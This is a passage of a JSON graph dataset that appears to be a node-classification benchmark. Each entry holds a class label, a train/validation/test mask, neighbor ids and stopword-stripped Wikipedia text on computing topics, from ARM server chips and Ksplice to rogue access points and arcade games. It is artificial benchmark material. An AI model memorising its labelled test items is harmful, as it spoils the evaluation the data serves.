      8990,
      4512,
      6819,
      8739,
      11688,
      5677,
      7983,
      4529,
      5684,
      7862,
      3895,
      1591,
      5048,
      9144,
      8385,
      5314,
      9666,
      9926,
      3920,
      11219,
      2901,
      4956,
      479,
      4069,
      102,
      11625,
      7274,
      5612,
      10994,
      3573,
      10486,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 4508,
    "label": 3,
    "text": "Qualcomm_Centriq:qualcomm centriq centriq brand system chip soc semiconductor products designed marketed qualcomm data centers centriq central processing unit cpu uses arm risc instruction set multiple cpu cores single chip november 2014 qualcomm announced developing arm armv8-a microarchitecture based cpu purpose-built data centers december 2016 company announced demonstrated first multi-core cpus based custom arm armv8-a microarchitecture first centriq 2400 series products made available server manufacturers november 2017 first products qualcomm introduced falkor armv8-a microarchitecture chip 48 qualcomm custom designed falkor cores 2.6ghz six-channel ddr4 memory 60 mb l3 cache number reviews noted release centriq expected face significant competition established x86-64 data-center cpu manufacturers intel amd arm microarchitecture server products cavium thunderx2 addition competitive pressures noted running established workloads arm microarchitectures requires re-optimizing recompiling software x86-64 emulation presenting barrier entry potential customers",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      10945,
      9928,
      2273,
      2788,
      3301,
      5356,
      9964,
      1776,
      6391,
      3835,
      781,
      5417,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4505,
      1952,
      5028,
      7077,
      9638,
      10675,
      3511,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 4509,
    "label": 0,
    "text": "North_American_Chapter_of_the_Association_for_Computational_Linguistics:north american chapter association computational linguistics north american chapter association computational linguistics naacl provides regional focus members association computational linguistics acl north america well central south america organizes annual conferences promotes cooperation information exchange among related scientific professional societies encourages facilitates acl membership people institutions americas provides source information regional activities acl executive committee naacl hosts annual professional conference north american city alternating years acl holds annual conference elsewhere current officers naacl include owen rambow chair lillian lee secretary christopher manning treasurer graeme hirst past chair",
    "neighbors": [
      7780,
      1890,
      7724,
      10557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4510,
    "label": 7,
    "text": "WEB2GRID:web2grid web2grid project aims support web 2.0 communities dynamically building necessary infrastructure needed processing high-end tasks community way content generated joint effort members web2grid technology enables community build required infrastructure joint community effort exploiting volunteer computing resources community members order achieve goal web2grid exploits sztaki desktop grid boinc 3g bridge technologies developed eu fp7 edges enabling desktop grids e-science eu fp7 edgi european desktop grid initiative projects project started 2009 technically coordinated prof. peter kacsuk head laboratory parallel distributed systems lpds mta-sztaki hungary web2 technologies assist assure resources desktop grid community voluntary settlement bases developed platform extended desktop grid systems offers back-end infrastructure operational requirements web2 portals systems combining web2 desktop grid technologies web2 extend capabilities community contents towards shared services help grid technologies project aims develop tools interfaces methodologies above-mentioned targeted services established closed local desktop grid open global desktop grid environments three main blocks project grid web2 connections two technologies last decades grid systems offered large-scale distributed computing storage services mainly academic university research area focus shifting towards services knowledge sharing extension application domain standardized access methods eliminating system heterogeneity grid point view project relies results eu fp7 supported edges enabling desktop grids e-science infrastructure project desktop grids system often based community offerings similar web2 content building solution edges project important grid/web2 integration web2grid project also extends edges technologies towards direction commercial grids web2 services owner server provides service framework real content shared maintained users generally due large number connections users web2 systems handle heavy data traffic complex relations may needs large computational power many cases web2 side numerous application topics large capacity solved grid technologies connection web2 grid realized well defined low-level application development interface api high-level graphical application development solutions project partners web2 applications come various fields justifies need development multi-level interfaces project benefits numerous eu fp6 eu fp7 project achievements connecting web2 communities grid technologies project aims achieve various social economical goals including following partners participate project",
    "neighbors": [
      6042,
      8420
    ],
    "mask": "Train"
  },
  {
    "node_id": 4511,
    "label": 4,
    "text": "NetBarrier_X4:netbarrier x4 netbarrier x4 discontinued version intego netbarrier line firewall os x features cookie cleaner browser history cleaner internet traffic statistic internet bandwidth meter cookie filters information hiding firewall customizable already configured options restrictions network client local server server client customized customized option allows flexible firewall configuration netbarrier features integrated virusbarrier x6 longer sold standalone product",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      6797,
      1172,
      9496,
      3482,
      1436,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4512,
    "label": 9,
    "text": "BlueDragon:bluedragon bluedragon coldfusion markup language cfml engine comparable adobe systems coldfusion licensed distributed new atlanta tagservlet ltd based scotland bluedragon also distributed supported bea systems oracle weblogic server server platform bluedragon applications run variety platforms including microsoft windows linux mac os x mostly compatible coldfusion mx 7 march 2008 new atlanta announced future versions bluedragon java ee editions would released open source products open source version released open bluedragon openbd december 2008 bluedragon available six editions first two editions standalone servers run windows linux os x bd j2ee cfml applications deployed j2ee server enabling integration cfml j2ee enabled coldfusion mx bd bea weblogic edition special edition based bd j2ee use bea weblogic server bd.net extends microsoft .net framework iis permit deployment cfml applications native ms .net web applications offering integration cfml asp.net possible coldfusion server jx j2ee ms .net bea weblogic editions bluedragon commercial products available 30-day unlimited trials convert single-ip developer edition expiration server edition hand free deployment—though hosting redeployment 6.2 release commercial use differences cfml tags supported free server edition supports odbc drivers ms windows mysql postgresql linux mac os x supports iis ms windows apache linux mac os x support secured ssl connections none limitations free server edition exist commercial server jx j2ee .net bea weblogic editions .net edition bluedragon runs microsoft .net platform bd.net enables cfml applications leverage .net platform allows integration cfml asp.net well .net objects open bluedragon open source version bluedragon released gnu general public license version 3 gplv3 chief differences open source j2ee version removal commercial libraries e.g. pdf generation jturbo jdbc driver microsoft sql server bluedragon administrator application runs standard j2ee application server tomcat jboss jetty original version bluedragon released 2002 myspace used .net version bluedragon power online applications 2007 though bluedragon 7.0 designed compatible adobe coldfusion mx 7.0.2 differences two cfml implementations bluedragon offers several advantages tags functions functionality found coldfusion similarly tags functions found coldfusion supported currently bluedragon new atlanta maintains complete list incompatibilities adobe coldfusion mx documentation number popular coldfusion frameworks fully supported bluedragon list useful resources developers see coldfusion development aids section",
    "neighbors": [
      3469,
      6797,
      9618,
      148,
      4507,
      4512,
      6819,
      8739,
      7983,
      4529,
      7862,
      823,
      3895,
      5048,
      9144,
      5314,
      9666,
      102,
      5612,
      10994
    ],
    "mask": "Train"
  },
  {
    "node_id": 4513,
    "label": 2,
    "text": "Page_address_register:page address register page address register par contains physical addresses pages currently held main memory computer system pars used order avoid excessive use address table operating systems par may check page number entries par simultaneously allowing retrieve pages physical address quickly par used single process used pages frequently referenced though pages may change process behaviour changes accordance principle locality example computer made use pars atlas",
    "neighbors": [
      4423,
      1801,
      7983,
      11539,
      3702
    ],
    "mask": "None"
  },
  {
    "node_id": 4514,
    "label": 4,
    "text": "Weplab:weplab weplab tool designed teach wired equivalent privacy wep wireless encryption protocol works explain security vulnerabilities protocol demonstrate attacks used compromise wep protected wireless network weplab designed crack wep keys analyze wireless security network educational point view author attempted make source code clear possible instead implementing optimizations would obfuscate weplab works unix-like systems like gnu/linux *bsd mac os x cygwin layer windows weplab tries break wep key using several known attacks",
    "neighbors": [
      5612,
      4140,
      6797,
      7983,
      2961,
      5397,
      823,
      10329,
      9151
    ],
    "mask": "None"
  },
  {
    "node_id": 4515,
    "label": 3,
    "text": "Windows_CE_5.0:windows ce 5.0 windows ce 5.0 codenamed macallan magellan brand gps units run successor windows ce 4.2 third release windows ce .net family first released july 9 2004 like predecessors windows ce 5.0 marketed towards embedded device market independent device vendors windows ce 5.0 billed low-cost compact fast-to-market real-time operating system available x86 arm mips superh microprocessor-based systems windows ce 5.0 builds previous windows ce releases adoption shared source since 2001 microsoft steadily expanding available windows ce source tree embedded system developers windows ce 5.0 open microsoft operating system date though system available shared source agreements developers freedom modify kernel level without need share changes microsoft competitors windows ce 5.x base os windows mobile 6.0 6.1 6.5 x86 platform windows ce 5.0 competes microsoft embedded operating systems windows xp embedded predecessor windows nt embedded platform builder ide windows ce 5.0 last builder tool available standalone product windows ce 5.0 currently available device emulator according microsoft windows ce preferable windows xp embedded situations demanding wireless multimedia requirements need met following primary considerations “ choosing right version ” also difference cost",
    "neighbors": [
      8576,
      641,
      2179,
      3463,
      651,
      6797,
      8080,
      3857,
      1298,
      7057,
      2196,
      8976,
      9366,
      10896,
      11283,
      4505,
      11301,
      3496,
      6441,
      6697,
      1581,
      7983,
      3250,
      3890,
      9910,
      6462,
      7615,
      321,
      7106,
      7234,
      582,
      1098,
      10957,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      5600,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      9448,
      9964,
      10989,
      5103,
      499,
      5363,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4516,
    "label": 9,
    "text": "Game_Oriented_Assembly_Lisp:game oriented assembly lisp game oriented assembly lisp goal programming language dialect language lisp made video games developed andy gavin jak daxter team company naughty dog written using allegro common lisp used development entire jak daxter series games syntactically goal resembles lisp dialect scheme though many idiosyncratic object-oriented programming features classes inheritance virtual functions goal encourages imperative programming style programs tend consist sequence events executed rather functional programming style functions evaluated recursively diversion scheme allows side effects encourage imperative style goal run interpreter instead compiled directly playstation 2 machine code execute offers limited facilities garbage collection relying extensively runtime support offers dynamic memory allocation primitives designed make well-suited running constant memory video game console goal extensive support inlined assembly language code using special codice_1 form allowing programs freely mix assembly higher-level constructs within one function goal compiler implemented allegro common lisp supports long term compiling listener session gives compiler knowledge state compiled thus running program including symbol table addition dynamic linking allows function edited recompiled uploaded inserted running game without restart process similar edit continue feature offered c++ compilers allows programs replace arbitrary amounts code even entire object files interrupt running game debugger feature used implement code level streaming jak daxter games goal first use game predecessor language game oriented object lisp gool also developed andy gavin crash bandicoot game since naughty dog longer employs goal primary development maintenance engineer pressure new parent company sony share technology studios naughty dog transitioned away lisp however since resumed using scripting playstation 3 games including last us",
    "neighbors": [
      10752,
      4098,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      10316,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      7273,
      2666,
      6252,
      5751,
      7805,
      9345,
      1159,
      9865,
      9871,
      9877,
      6311,
      5803,
      684,
      2225,
      4786,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      8937,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      10571,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      477,
      3051,
      5611,
      9714,
      7670,
      11255,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 4517,
    "label": 4,
    "text": "Rogue_access_point:rogue access point rogue access point wireless access point installed secure network without explicit authorization local network administrator whether added well-meaning employee malicious attacker although technically easy well-meaning employee install soft access point inexpensive wireless router—perhaps make access mobile devices easier—it likely configure open poor security potentially allow access unauthorized parties attacker installs access point able run various types vulnerability scanners rather physically inside organization attack remotely—perhaps reception area adjacent building car park high gain antenna even several miles away prevent installation rogue access points organizations install wireless intrusion prevention systems monitor radio spectrum unauthorized access points presence large number wireless access points sensed airspace typical enterprise facility include managed access points secure network plus access points neighborhood wireless intrusion prevention system facilitates job auditing access points continuous basis learn whether rogue access points among order detect rogue access points two conditions need tested first two conditions easy test—compare wireless mac address also called bssid access point managed access point bssid list however automated testing second condition become challenging light following factors need cover different types access point devices bridging nat router unencrypted wireless links encrypted wireless links different types relations wired wireless mac addresses access points soft access points b necessity determine access point connectivity acceptable response time large networks c requirement avoid false positives negatives described false positives occur wireless intrusion prevention system detects access point actually connected secure network wired rogue frequent false positives result wastage administrative bandwidth spent chasing possibility false positives also creates hindrance enabling automated blocking wired rogues due fear blocking friendly neighborhood access point false negatives occur wireless intrusion prevention system fails detect access point actually connected secure network wired rogue false negatives result security holes unauthorized access point found connected secure network rogue access point first kind also called “ wired rogue ” hand unauthorized access point found connected secure network external access point among external access points found mischievous potential risk e.g. whose settings attract already attracted secure network wireless clients tagged rogue access point second kind often called evil twin soft access point soft ap set wi-fi adapter using example windows virtual wi-fi intel wifi makes possible without need physical wi-fi router share wired network access one computer wireless clients connected soft ap employee sets soft ap machine without coordinating department shares corporate network soft ap becomes rogue ap",
    "neighbors": [
      6466,
      2084,
      4517,
      9640,
      9968,
      794,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4518,
    "label": 3,
    "text": "Pooyan:pooyan pooyan ported atari 2600 atari 8-bit family tandy color computer 2 commodore 64 sord m5 msx apple ii tandy trs-80 tomy tutor pv-1000 famicom player controls mama pig whose babies kidnapped pack wolves must rescue using bow arrow slabs meat controls consist two-position up/down joystick moves elevator mama pig rides button fires arrows throws meat level consists two rounds first wolves descend slowly high ledge using balloons player must shoot order drop ground wolves reach ground safely climb set ladders behind elevator try eat mama pig moves front second round wolves start ground inflate balloons order ascend cliff boulder resting push toward edge airborne wolves throw rocks rounds trying hit mama pig addition balloon carrying last boss wolf second round must shot several times order defeat reaches cliff player must defeat additional enemies facing boss slab meat occasionally appears top elevator range motion picking allows player throw distracting wolves on/near trajectory causing let go balloons crash ground bonus points stray balloons dropped fruits also shot extra points every second round bonus screen played first screen requires player defeat group wolves using meat second awards points shooting fruits thrown wolves two screens alternate level player loses one life mama pig hit rock eaten wolf ladders first round crushed boulder many wolves reach cliff push edge second round lives lost game ends game starts day met bear heard opening scene wolves kidnap mama babies first stage theme bears slight resemblance main theme music frogger another konami arcade game song part desecration rag operatic nightmare felix arndt portion mimics beginning antonín dvořák humoresque opus 101 number 7 second stage cleared second time part oh susanna heard pooyan included compilation disc konami 80 arcade gallery playstation emulated version game released 2006 playstation 2 japan part oretachi geasen zoku sono -series famicom port released virtual console japan series extra ops known pooyan missions involves shooting fulton surface-to-air recovery balloons carrying abducted soldiers air sound effects music arcade game used throughout mission largely identical bootleg sold name pootan david hanzman rochester ny usa scored world record 1,609,250 points arcade version pooyan december 16 1983",
    "neighbors": [
      3788,
      10316,
      9006,
      1776,
      10576,
      10931,
      599
    ],
    "mask": "Test"
  },
  {
    "node_id": 4519,
    "label": 9,
    "text": "ASF+SDF_Meta_Environment:asf+sdf meta environment asf+sdf meta-environment ide toolset interactive program analysis transformation combines sdf syntax definition formalism asf algebraic specification formalism technologies features components toolbus component interconnection architecture somewhat like d-bus corba based process algebra formalism aterms generic data representation format efficient terms resource usage due maximal subterm sharing automatic garbage collection used throughout tools toolset apis provided c java developers use applications",
    "neighbors": [
      932,
      605,
      2374,
      4293,
      6694,
      8262,
      5677,
      7983,
      11475,
      4980,
      5492,
      823,
      5399,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4520,
    "label": 2,
    "text": "GNUstep_Renaissance:gnustep renaissance gnustep renaissance development framework reads xml descriptions graphical user interfaces application bundle converts native widgets connections runtime either gnustep mac os x. gnustep renaissance written nicola pero alternative nib gorm files used interface builder gorm respectively unlike aforementioned formats renaissance generate interfaces run without modification either gnustep mac os x also uses feature called autolayout means localized strings manually resized january 2006 gnustep renaissance beta software graphical frontend renaissance yet exist stable release made since 2008 though downloadable binary rebuilt still previous version simple example interface specification assuming file application bundle named sample.gsmarkup loaded following objective-c code",
    "neighbors": [
      10406,
      10470,
      5612,
      7983,
      8304,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 4521,
    "label": 2,
    "text": "Ksplice:ksplice ksplice open-source extension linux kernel allows security patches applied running kernel without need reboots avoiding downtimes improving availability technique broadly referred dynamic software updating ksplice supports patches make significant semantic changes kernel data structures ksplice implemented linux ia-32 x86-64 architectures developed ksplice inc. 21 july 2011 oracle acquired ksplice started offering support oracle linux support red hat enterprise linux dropped turned free 30-day trial rhel customers incentive migrate oracle linux premier support time use oracle unbreakable enterprise kernel uek became requirement using ksplice production systems ksplice available free desktop linux installations official support available fedora ubuntu linux distributions ksplice takes input unified diff original kernel source code updates running kernel memory using ksplice require preparation system originally booted running kernel needs special prior compiling example order generate update ksplice must determine code within kernel changed source code patch ksplice performs analysis executable linkable format elf object code layer rather c source code layer apply patch ksplice first freezes execution computer program running system verifies processors middle executing functions modified patch ksplice modifies beginning changed functions instead point new updated versions functions modifies data structures memory need changed finally ksplice resumes processor running left fully automatic ksplice design originally limited patches introduce semantic changes data structures since linux kernel security patches make kinds changes evaluation linux kernel security patches may 2005 may 2008 found ksplice able apply fixes 64 significant kernel vulnerabilities discovered interval 2009 major linux vendors asked customers install kernel update per month patches introduce semantic changes data structures ksplice requires programmer write short amount additional code help apply patch necessary 12 updates time period ksplice software created four mit students based jeff arnold master thesis later created ksplice inc. around may 2009 company mit 100k entrepreneurship competition cyber security challenge global security challenge whereas ksplice software provided open source license ksplice inc. provided service make easier use software ksplice inc. provided prebuilt tested updates red hat centos debian ubuntu fedora linux distributions virtualization technologies openvz virtuozzo also supported updates ubuntu desktop fedora systems provided free charge whereas platforms offered subscription basis 21 july 2011 oracle corporation announced acquired ksplice inc. time company acquired ksplice inc. claimed 700 companies using service protect 100,000 servers service available multiple linux distributions stated time acquisition oracle believes enterprise linux provider offer zero downtime updates explicitly oracle plan support use ksplice technology red hat enterprise linux existing legacy customers continue supported ksplice new customers accepted platforms ksplice available free fedora ubuntu january 2016 ksplice integrated oracle unbreakable enterprise kernel release 4 oracle linux 6 7 oracle redistribution red hat enterprise linux",
    "neighbors": [
      5636,
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10785,
      9762,
      6180,
      5158,
      8233,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      6244,
      5222,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      6797,
      4238,
      7821,
      10382,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      7403,
      5356,
      9455,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      10499,
      5380,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      792,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      7057,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      1952,
      7584,
      1444,
      421,
      1445,
      935,
      9637,
      4011,
      1456,
      11184,
      1972,
      6075,
      6078,
      9151,
      9667,
      8136,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4522,
    "label": 4,
    "text": "Linux_Spike_Trojan_malware:linux spike trojan malware linux spike trojan malware widely known mrblack type malware infects routers eventually spreads routers incapsula internet security firm first saw malware december 2014 tool prone attack devices still use default credentials bot type malware allows attacker take control affected computer also known web robots bots usually part network infected machines known botnet typically made victim machines stretch across globe router infected attack injects malware order configure ddos attacks used mitm attacks cookie hijacking attacks targeted router infected mrblack regarded one widespread malware varieties infecting forty thousand routers",
    "neighbors": [
      3941,
      2409,
      8176,
      4863,
      87,
      823,
      7515,
      3581,
      3807
    ],
    "mask": "Train"
  },
  {
    "node_id": 4523,
    "label": 3,
    "text": "Socket_1:socket 1 socket 1 originally called overdrive socket second series standard cpu sockets created intel various x86 microprocessors inserted upgrade intel first standard 168-pin pin grid array pga socket first official designation socket 1 intended 486 upgrade socket added one extra pin prevent upgrade chips inserted incorrectly socket 1 169-pin low insertion force lif zero insertion force zif 17×17 pin grid array pga socket suitable 5-volt 16 33 mhz 486 sx 486 dx 486 dx2 486 overdrive processors",
    "neighbors": [
      3588,
      5901,
      5523,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      2604,
      2350,
      6192,
      9649,
      4537,
      2874,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      499,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 4524,
    "label": 3,
    "text": "Time_Pilot:time pilot time pilot 夕イム・パイ口ツ卜 multidirectional shooter designed yoshiki okamoto released arcades konami 1982 distributed united states centuri engaging aerial combat player-controlled jet flies across open airspace scrolls indefinitely directions level themed different time period home ports atari 2600 msx colecovision released 1983 sequel time pilot '84 released arcades 1984 top view instead side view allows player shoot guided missiles drops time travel motif instead takes place science fiction-themed landscape player assumes role pilot futuristic fighter jet trying rescue fellow pilots trapped different time eras level player must fight hordes enemy craft defeat much stronger enemy ship player plane always remains center screen 56 enemy craft defeated mothership time period appears destroyed player time-travels next level level parachuting pilot occasionally appear rescuing pilot initially award 1,000 points increase 1,000 points consecutive rescue maximum 5,000 award reset 1,000 points upon losing life advancing level enemy formations appear level formations heralded series quick tones 2,000 points awarded entire formation destroyed within approximately 3 seconds extra lives usually given 10,000 per 50,000 scored thereafter first four levels common enemies motherships fire yellow bullets similar white bullets fired player except travel rather slowly 1910 level biplanes fire bombs addition yellow bullets bombs resemble tin cans initially fired upward accelerate downward moving faster fall bottom screen paths simulate gravity following parabolic trajectory thrown object despite fact player fly downward indefinitely never reach ground time gravity present 1940 planes slimmer biplanes blend background making tougher target level also features red-and-yellow supply planes fly horizontally across screen require multiple hits destroy fire player pose threat long player crash helicopters 1970 smaller airplanes fire bullets well homing missiles missiles travel faster player make sharp turns player destroy missiles shooting avoid turning sharply jets 1982 resemble player craft aggressive making easier player collide fire homing missles helicopters meaning typically missiles screen given time 1982 1970 2001 action shifts outer space enemies flying saucers saucers fire fast-travelling circular bullets blend background asteroids screen hurt player serve camouflage enemies missiles saucers bullets missiles shot destroyed according account yoshiki okamoto proposal time pilot initially rejected boss konami assigned okamoto work driving game instead okamoto secretly gave instructions programmer work idea pretending working driving game front boss fury 1983 clone computer shack trs-80 color computer two unrelated clones name released 1984 kingsoft space pilot commodore 64 superior software space pilot bbc micro remake game rumored works nintendo 64",
    "neighbors": [
      4357,
      9957,
      10695,
      3788,
      10316,
      9006,
      1776,
      6449,
      10576,
      10931,
      8887
    ],
    "mask": "None"
  },
  {
    "node_id": 4525,
    "label": 3,
    "text": "Multikernel:multikernel multikernel operating system treats multi-core machine network independent cores distributed system assume shared memory rather implements inter-process communications message-passing",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5029,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      10675,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      5452,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 4526,
    "label": 7,
    "text": "PSSC_Labs:pssc labs pssc labs california-based company provides supercomputing solutions united states internationally products include high-performance servers clusters workstations raid storage systems scientific research government military entertainment content creators developers private clouds company implemented clustering software nasa goddard beowulf project supercomputers designed bioinformatics medical imaging computational chemistry scientific applications pssc labs founded 1984 larry lesser 1998 manufactured aeneas supercomputer dr. herbert hamber university california irvine physics astronomy department based linux maximum speed 20.1 gigaflops 2001 company developed cbest software packages utilities custom scripts used ease cluster administration process 2003 company released third version cluster management software support 32-bit 64-bit amd intel processors linux kernel open source tools 2005 pssc labs demonstrated new water-cooling technology high-performance computers acm/ieee supercomputing conference seattle washington 2007 company focused supercomputer development life sciences researchers announced technological solution full-genome data analysis including assembly read mapping analysis large amounts high-throughput dna rna sequencing data 2008 pssc labs designed powerserve quattro i/a 4000 supercomputer genome sequencing 2013 released cloudoop server platform big data analytics hadoop server offers 50tb storage space 1ru company joined cloudera partner program following year certified cloudoop 12000 2014 compatible cloudera enterprise 5 year mapr started using cloudoop 12000 platform record setting time series data base ingestion rate company joined hortonworks partner program 2015 company cloudoop 12000 certified compatible hortonworks hdp 2.2",
    "neighbors": [
      330,
      2834,
      8446,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 4527,
    "label": 3,
    "text": "Ultima_III:_Exodus:ultima iii exodus ultima iii exodus third game series ultima role-playing video games exodus also name game principal antagonist final installment age darkness trilogy released 1983 first ultima game published origin systems originally developed apple ii exodus eventually ported 13 platforms including nes/famicom remake ultima iii revolves around exodus spawn mondain minax ultima ultima ii respectively threatening world sosaria player travels sosaria defeat exodus restore world peace ultima iii hosts advances graphics particularly animation adds musical score increases player options gameplay larger party interactivity game world ultima iii followed 1985 exodus featured revolutionary graphics time one first computer rpgs display animated characters also exodus differs previous games players direct actions party four characters rather one regular play characters represented single player icon move one however battle mode character represented separately tactical battle screen player alternates commands character order followed enemy character turn differs two previous games ultima series player simply depicted trading blows one opponent main map either defeated enemies overworld map seen least temporarily avoided enemies dungeons appear randomly without forewarning party four player uses chosen beginning game choice 11 classes fighter paladin cleric wizard ranger thief barbarian lark illusionist druid alchemist player also chooses among five races human elf dwarf bobbit fuzzy players assign points statistics strength dexterity intelligence wisdom races determine limitations maximum stat growth thus case intelligence wisdom maximum spellcasting ability character classes differ terms fighting skill magical abilities thieving abilities varying degrees proficiency fighters example use weapons armor lack thieving magic abilities clerics use maces chain armor clerical spells alchemists use daggers cloth armor half wizard spells half thieving abilities character begins level 1 increases individually maximum effective level characters 25 beyond point level continue increase however number hit points fixed 2550 maximum hit points character calculated following formula hp 100 l 50 l current level character character gained enough experience points must transact lord british character level aside ability talk townspeople commands used commands player use bribe steal fight bribing used make certain guards go away post steal used townspeople enemies result conflict townspeople caught player choose fight townsperson prompt guards chase characters always come parties eight difficult defeat also choose fight lord british killed thus resulting long drawn-out fight player ultimately lose lord british temporarily killed cannon fire ship castle moat exiting re-entering castle restores unlike two previous ultima games wire-frame first-person dungeons exodus dungeons solid-3d appearance integrated game plot dungeons necessary obtain certain marks needed finish game dungeon 8 levels deeper level challenging enemies note monsters spawned dungeons based character level overworld monsters rather based dungeon level encountered going deep certain dungeons may hard characters early stages game one find many chests gold weapons armor inside dungeons many trapped aside chests marks one find fountains dungeons heal cure poison peering gems allows see map given dungeon level torches light-casting spells necessary able see inside dungeons three modes travel game foot horseback boat getting around foot slow often lead monsters catching horseback gives advantage moving faster consuming less food making getting away unwanted fights easier getting boat requires players reach certain level pirate ships begin appearing pirate ship defeated boat belongs player obtaining boat necessary order visit island ambrosia reach exodus thus win game denying player ability see behind mountain peaks forests walls overland maps contain many small surprises hidden treasure secret paths out-of-the-way informants look game longer based certain characteristics apple ii hardware rather carefully designed screen layout beating game requires player get four marks four prayer cards get altar exodus insert cards particular order thus defeat exodus set earth story exodus returns player sosaria world game named chief villain exodus creation minax mondain series later describes neither human machine although demonic figure appears cover game exodus turns something like computer possibly artificial intelligence defeat player acquire four magic punch cards insert mainframe specific order beginning game exodus terrorizing land sosaria stronghold isle fire player summoned lord british defeat exodus embarks quest takes lost land ambrosia depths dungeons sosaria receive powerful magical branding marks find mysterious time lord finally isle fire confront exodus lair game ends immediately upon exodus defeat unlike many games genre exodus simply killed battle strong party adventurers puzzle-solving paying attention clues given throughout game end game players instructed report thy victory origin received certificate completion autographed richard garriott although last game series take place sosaria places game ambrosia isle fire make appearances later games ultima vii ultima online ultima iii first game series published richard garriott company origin systems ports appeared many different systems 120,000 copies ultima iii sold video magazine listed game seventh list best selling video games march 1985 ii computing listing fifth magazine list top apple ii games late 1985 based sales market-share data exodus credited game laid foundation role-playing video game genre influencing games dragon quest final fantasy turn exodus influenced wizardry richard garriot credited inspiration behind party-based combat game computer gaming world stated february 1994 exodus game became known ultima hundreds thousands cartridge gamers softline stated ultima iii far surpasses predecessors praising masterfully unified plot individual tactical combat magazine concluded game upgrades market several ways sets new standards fantasy gaming state art happily also shows us maturing artistic discipline part imaginative author computer gaming world scorpia 1983 called ultima iii unquestionably best series far ... many hours enjoyment frustration although criticized ending 